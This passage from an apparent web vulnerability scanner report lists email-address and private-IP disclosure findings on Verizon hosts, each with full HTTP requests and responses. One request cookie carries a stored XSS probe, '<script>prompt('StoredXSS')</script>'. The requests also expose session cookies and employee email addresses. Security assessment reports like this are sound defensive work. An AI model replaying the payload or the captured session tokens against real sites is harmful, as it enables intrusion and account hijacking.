}
}
}
urlconvert_sub();
}

function urlconvert_sub() {
var strVerrizonNet = "www.verizon.net/central@my.verizon.com/central;www.verizon.net/ssowebapp@signin.verizon.com/sso;";
var urlspltChange = strVerrizonNet.split(';');
var aTags = document.getElementsByTagName && document.getElementsByTagName('A');
for (var i = 0; i < aTags.length; i++) {

...[SNIP]...

19.25. http://www22.verizon.com/content/commontemplates/includes/Javascript/ddpng.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /content/commontemplates/includes/Javascript/ddpng.js

Issue detail

The following email address was disclosed in the response:

Request

GET /content/commontemplates/includes/Javascript/ddpng.js HTTP/1.1
Host: www22.verizon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/residentialhelp/fiostv
Cookie: ak-sf=false; __switchTo5x=51; __unam=49dc76-1323a4a13fb-1bbb4ff9-1; ASP.NET_SessionId=ncxmtseom3hg3h4542cc0c55; GlobalSessionID=NEScwnwaL4QccG18LnT8IJ7HQ%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:13:38 PM; AkaUTrackingID=804E8C682B3FA4D861FA571CC854E9FD; AkaSTrackingID=22240856919E5F4D120128A4C01974E7; V347=3JqCYcsE1rlAhTfmCIUyRZ-iggeiohK6a-FKkJ_aMvvIaMkdz3Ks80g; CP=null*; refURL=http://www22.verizon.com/residentialhelp/fiostv; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ca45525d5f4f58455e445a4a423660; Product=A; ProductXML=A; canigetfios=Y; showpromo=N; BusinessUnit=wireless; XPID=BO-00000000521444319_%20%7C%20HSIPOE_2; ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>prompt("StoredXSS")</script>af81f92fd39; ContextInfo_TV=FiOSTV; IHAClientIP=112.64.2.103; CMS_TimeZoneOffset=300; RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23

Response

HTTP/1.0 200 OK
Content-Length: 12370
Content-Type: application/x-javascript
Last-Modified: Tue, 24 May 2011 18:20:24 GMT
Accept-Ranges: bytes
ETag: "0e4a53f3f1acc1:6f42"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:29:13 GMT
Connection: close

/**
* DD_belatedPNG: Adds IE6 support: PNG images for CSS background-image and HTML <IMG/>.
* Author: Drew Diller
* Email: drew.diller@gmail.com
* URL: http://www.dillerdesign.com/experiment/DD_belatedPNG/
* Version: 0.0.8a
* Licensed under the MIT License: http://dillerdesign.com/experiment/DD_belatedPNG/#license
*
* Example usage:
* DD
...[SNIP]...

19.26. http://www22.verizon.com/onecms/vzcareers/ak-cached/4h/includes/javascript/globalalert.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /onecms/vzcareers/ak-cached/4h/includes/javascript/globalalert.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /onecms/vzcareers/ak-cached/4h/includes/javascript/globalalert.js HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/jobs/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BusinessUnit=business; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; CP=null*; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 10 Jun 2011 06:12:44 GMT
ETag: "122432c-740-4a55575437140:dtagent326GVC7"
Accept-Ranges: bytes
Content-Length: 1856
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: application/x-javascript
Cache-Control: public, max-age=14400
Date: Mon, 05 Sep 2011 22:18:40 GMT
Connection: close
Set-Cookie: dtCookie=8C98328CB529EE605B41B254E42B3E4A; Path=/; Domain=.verizon.com
Set-Cookie: NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660;path=/;httponly

/* ---------------------------------------------------------------------------------------------------------
Verizon Services Operations IT - Creative Development
   Leads:
   Lolly Chessie (lolly.chessie@vso.verizon.com)
   Radoslaw {R_d} Wilk (radoslaw.wilk@vso.verizon.com)
--------------------------------------------------------------------------------------------------------- */
var alertmain_manager = {
   show_if_new: function() {
/*        var current_alertmain_date =
...[SNIP]...

19.27. https://www22.verizon.com/ForYourHome/VZRepair/vziha/js/jslib.axd

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /ForYourHome/VZRepair/vziha/js/jslib.axd

Issue detail

The following email address was disclosed in the response:

Request

GET /ForYourHome/VZRepair/vziha/js/jslib.axd?d=isupport.js,Common.js,jquery-1.2.6.pack.js,jquery.ifixpng2.js,TeaLeaf.js,nifty.js,pagetracker.js,ihawebdata.js,jquery.min.js,jquery.dragable.js&v=2.2.0 HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: https://www22.verizon.com/ForYourHome/VZRepair/vziha/Service.aspx?ihaweb=WebSTBFrozen
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; CMS_TimeZoneOffset=300; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; ContextInfo_TV=FiOSTV; ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; IHAClientIP=112.64.2.103; CP=null*; 
refURL=http://www22.verizon.com/residentialhelp/fiostv; RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=VwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxAA==&IP=NQAwAC4AMgAzAC4AMQAyADMALgAxADAANgAsACAAOAAwAC4ANgA3AC4ANwA0AC4AMgAxADEALAAgADEAMQAyAC4ANgA0AC4AMQAuADEAMAA3AA==; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 19 Aug 2011 00:33:06 GMT
Vary: Accept-Encoding
Content-Type: text/javascript; charset=utf-8
Content-Length: 535378
Expires: Mon, 05 Sep 2011 22:24:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:24:39 GMT
Connection: keep-alive

/*isupport.js*/

function processToServer(form)
{try{if(document.getElementById('dateList')!=null){var dateValue=document.getElementById('dateList').value;var timeValue=document.getElementById('timeL
...[SNIP]...
L="Please enter your name";}
else if(Email=="")
{alert_msg.innerHTML="Please enter your EmailID";}
else if(!Re_Email.test(Email))
{alert_msg.innerHTML="Please enter your valid EmailID. Example format: abc@verizon.net";}
else if((document.isupport.dateList)!=null)
{alert_msg.style.display='none';sendMsgToServer(document.isupport);}
else
{alert_msg.style.display='none';sendMsgToServer(document.isupport);}}
else
{ale
...[SNIP]...
lse if(document.getElementById('Notif_PrefE')!=null&&document.getElementById('Notif_PrefE').checked==true&&!Re_Email.test(Email))
{alert_msg.innerHTML="Please enter your valid EmailID. Example format: abc@verizon.net";}
else if(document.getElementById('dynTxtArea')!=null&&document.getElementById('dynTxtArea').value.length>
...[SNIP]...
lse if(document.getElementById('Notif_PrefE')!=null&&document.getElementById('Notif_PrefE').checked==true&&!Re_Email.test(Email))
{alert_msg.innerHTML="Please enter your valid EmailID. Example format: abc@verizon.net";}
else if(document.getElementById('dynTxtArea')!=null&&document.getElementById('dynTxtArea').value.length>
...[SNIP]...

20. Private IP addresses disclosed
There are 15 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.


20.1. https://b2b.verizonwireless.com/b2b/commerce/privacy.go

Summary

Severity:   Information
Confidence:   Certain
Host:   https://b2b.verizonwireless.com
Path:   /b2b/commerce/privacy.go

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /b2b/commerce/privacy.go HTTP/1.1
Host: b2b.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 05 Sep 2011 22:34:41 GMT
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="ALL DSP COR HISa OTPa OUR BUS UNI PUR COM NAV INT"
x-wily-servlet: Clear appServerIp=10.170.176.64&agentName=puma23&servletName=DispatcherServlet&agentHost=obswbbizzap65&agentProcess=COMM
Content-Language: en
X-Powered-By: Servlet/2.5 JSP/2.1
x-wily-info: Clear guid=3BBAAAFA0AAAB0403CD121F020CB8EFE
Content-Length: 40953

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="ht
...[SNIP]...

20.2. http://content.atomz.com/autocomplete/sp10/04/3b/7b/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.atomz.com
Path:   /autocomplete/sp10/04/3b/7b/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /autocomplete/sp10/04/3b/7b/ HTTP/1.1
Host: content.atomz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:34:46 GMT
Content-Type: application/json
Via: 1.1 content.atomz.com:84
X-Cache: MISS from content.atomz.com
Connection: close
Content-Length: 614862

( [ "",
"30 day trial",
"32 bit",
"32 bit flash player",
"360 degree view",
"3d and technical imaging in adobe photoshop cs4",
"3d basics in adobe photoshop cs4",
"3d flash",
"3d glasses effect in ado
...[SNIP]...
ets at run time in adobe..flex..4.5",
"loadsound method behaves differently in flash light 3.1 than in flash light 2.x and 3.0",
"local folder",
"localconnection fails after 5 attempts in flash player 10.0.32.18 (mac os x)",
"localconnection objects prematurely close / getapplicationversion() calls return null unexpectedly",
"locate licensing serial numbers | cs5.5 production premium and master collection",
"
...[SNIP]...

20.3. http://newscenter.verizon.com/404.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newscenter.verizon.com
Path:   /404.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /404.html HTTP/1.1
Host: newscenter.verizon.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; VISITORID=1597650297; JSESSIONID=abcEBYCpNovpd9FINW7it; CONVIO.referrer=http%3A//newscenter.verizon.com/fact-sheets/verizon-high-speed-internet.html

Response

HTTP/1.1 200 OK
Server: Resin/3.1.8
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 05 Sep 2011 22:43:17 GMT
Set-Cookie: NSC_dnt_900_qvc=ffffffff09041e3145525d5f4f58455e445a4a4214f4;expires=Mon, 05-Sep-2011 23:43:17 GMT;path=/;httponly
Content-Length: 115137

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="generator" content="Convio CMS" />
<script language="JavaScrip
...[SNIP]...
<!-- 10.12.0.32:8900 -->
...[SNIP]...

20.4. http://newscenter.verizon.com/404.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newscenter.verizon.com
Path:   /404.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /404.html HTTP/1.1
Host: newscenter.verizon.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; VISITORID=1597650297; JSESSIONID=abcEBYCpNovpd9FINW7it; CONVIO.referrer=http%3A//newscenter.verizon.com/fact-sheets/verizon-high-speed-internet.html

Response

HTTP/1.1 200 OK
Server: Resin/3.1.8
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 05 Sep 2011 22:43:17 GMT
Set-Cookie: NSC_dnt_900_qvc=ffffffff09041e0f45525d5f4f58455e445a4a4214f4;expires=Mon, 05-Sep-2011 23:43:17 GMT;path=/;httponly
Content-Length: 115137

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="generator" content="Convio CMS" />
<script language="JavaScrip
...[SNIP]...
<!-- 10.12.0.30:8900 -->
...[SNIP]...

20.5. http://newscenter.verizon.com/fact-sheets/verizon-high-speed-internet.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newscenter.verizon.com
Path:   /fact-sheets/verizon-high-speed-internet.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /fact-sheets/verizon-high-speed-internet.html HTTP/1.1
Host: newscenter.verizon.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=verizon+online+news+webmail#q=site:verizon.com+online+news+webmail&hl=en&prmd=ivns&ei=U1BlTuKkG8bkiAKp37G7Cg&start=20&sa=N&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; VISITORID=1597650297

Response

HTTP/1.1 200 OK
Server: Resin/3.1.8
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 05 Sep 2011 22:43:14 GMT
Set-Cookie: NSC_dnt_900_qvc=ffffffff09041e0f45525d5f4f58455e445a4a4214f4;expires=Mon, 05-Sep-2011 23:43:14 GMT;path=/;httponly
Content-Length: 125028

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="generator" content="Convio CMS" />
<script language="JavaScrip
...[SNIP]...
<!-- 10.12.0.30:8900 -->
...[SNIP]...

20.6. http://newscenter.verizon.com/fact-sheets/verizon-high-speed-internet.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newscenter.verizon.com
Path:   /fact-sheets/verizon-high-speed-internet.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /fact-sheets/verizon-high-speed-internet.html HTTP/1.1
Host: newscenter.verizon.com
Proxy-Connection: keep-alive
Referer: http://newscenter.verizon.com/fact-sheets/verizon-high-speed-internet.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; VISITORID=1597650297; JSESSIONID=abcEBYCpNovpd9FINW7it; CONVIO.referrer=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dverizon+online+news+webmail%23q%3Dsite%3Averizon.com+online+news+webmail%26hl%3Den%26prmd%3Divns%26ei%3DU1BlTuKkG8bkiAKp37G7Cg%26start%3D20%26sa%3DN%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Db7e6040383bebbf%26biw%3D1266%26bih%3D910

Response

HTTP/1.1 200 OK
Server: Resin/3.1.8
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 05 Sep 2011 22:43:16 GMT
Set-Cookie: NSC_dnt_900_qvc=ffffffff09041e3145525d5f4f58455e445a4a4214f4;expires=Mon, 05-Sep-2011 23:43:16 GMT;path=/;httponly
Content-Length: 125028

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="generator" content="Convio CMS" />
<script language="JavaScrip
...[SNIP]...
<!-- 10.12.0.32:8900 -->
...[SNIP]...

20.7. https://survey.qualtrics.com/SE/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://survey.qualtrics.com
Path:   /SE/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /SE/ HTTP/1.1
Host: survey.qualtrics.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 05 Sep 2011 22:35:56 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Expires: Mon, 05 Sep 2011 22:35:56 GMT
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
ServerAddr: 192.168.1.29
Content-Length: 3874
Connection: close
